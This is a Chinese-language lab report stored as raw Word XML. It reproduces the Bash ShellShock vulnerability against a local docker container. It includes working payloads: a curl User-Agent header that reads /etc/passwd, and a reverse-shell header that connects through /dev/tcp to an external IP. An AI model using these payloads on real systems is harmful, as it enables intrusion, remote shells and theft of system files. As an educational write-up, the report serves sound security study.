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ShellShock 漏洞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复现实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文楷体" w:hAnsi="华文楷体" w:eastAsia="华文楷体" w:cs="华文楷体"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 什么是ShellShock漏洞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Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞，启动Bash的时候，它不但会导入这个函数，而且也会把函数定义后面的命令执行。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在有些CGI脚本的设计中，数据是通过环境变量来传递的，这样就给了数据提供者利用Shellshock漏洞的机会。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简单来说就是由于服务器的cgi脚本调用了bash命令，由于bash版本过低，攻击者把有害数据写入环境变量，传到服务器端，触发服务器运行Bash脚本，完成攻击。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验证漏洞存在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漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告，其中出现了一条验证命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numP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env x='() { :;}; echo vulnerable' bash -c "echo this is a test "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/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如果在一个含有版本号小于bash 4.3的linux或者unix系统，本地执行以上命令，可能会得到以下输出：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/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Vulnerable this is a test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本地执行结果如下：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363855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5271135" cy="624205"/>
            <wp:effectExtent l="0" t="0" r="1905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3.</w:t>
      </w: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漏洞原理分析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了解bash自定义函数，只需要函数名就能够调用该函数。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funtion ShellShock {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 xml:space="preserve">  </w:t>
      </w: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echo "Injection"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 xml:space="preserve">} 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ShellShock   #调用这个函数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这个时候的Bash的环境变量：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KEY = ShellShock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VALUE = () { echo Injection; }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来看看ShellShock漏洞的真身：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export ShellShock='() { :; }; echo;/usr/bin/whoami'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bash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&gt;Kr0iNg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为什么调用bash的时候输出Injection了呢，看看它内部情况：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KEY = ShellShock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VALUE = () { :; }; echo;/usr/bin/whoami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bash读取了环境变量，在定义ShellShock之后直接调用了后面的bash命令。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t>一旦调用bash，自定义的语句就直接触发。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>漏洞复现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>我用docker在本地pull了一份存在Shellshock漏洞的程序进行测试。将它的端口转发到本机进行访问，访问127.0.0.1:8000。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>进行Shellshock漏洞测试，使用工具curl，测试命令：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207010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5861050" cy="2459990"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:wrapSquare wrapText="bothSides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 xml:space="preserve">curl -A </w:t>
      </w:r>
      <w:r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 xml:space="preserve">"() { echo ShellShock; }; echo; /bin/cat /etc/passwd" </w:t>
      </w:r>
      <w:r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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r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instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1:8000/cgi-bin/vulnerable" </w:instrText>
      </w:r>
      <w:r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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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>http://127.0.0.1:8000/cgi-bin/vulnerable</w:t>
      </w:r>
      <w:r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>使用curl -A 或者 -H 参数模拟Http头命令，并调用“cat /etc/passwd”读passwd文件，发送到存在Bash漏洞的docker容器，成功读取到了passwd文件内容。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>用Burpsuite来进行测试。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>修改http协议中的User-Agent字段为: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>() { :; };echo;/bin/cat /etc/passwd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396240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5628005" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="10795" b="9525"/>
            <wp:wrapSquare wrapText="bothSides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>成功读取passwd文件。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>发送http请求进行测试反弹shell。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>服务器开启监听：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>模拟浏览器头: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eastAsia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>User-Agent: () { :; };echo;/bin/bash -i &gt;&amp; /dev/tcp/47.92.80.16/1234 0&gt;&amp;1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256540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4119245" cy="3997325"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10795"/>
            <wp:wrapSquare wrapText="bothSides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9795" r="58000" b="474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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="华文楷体" w:hAnsi="华文楷体" w:eastAsia="华文楷体" w:cs="华文楷体"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>反弹成功，可以查看用户名，目录，系统版本等信息。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BBD44E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E9BBD44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E83282"/>
    <w:rsid w:val="58FB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codedark"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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2019-11-05T00:19:00Z</dcterms:created>
  <dc:creator>1</dc:creator>
  <cp:lastModifiedBy>高山流水</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-13T13:21:23Z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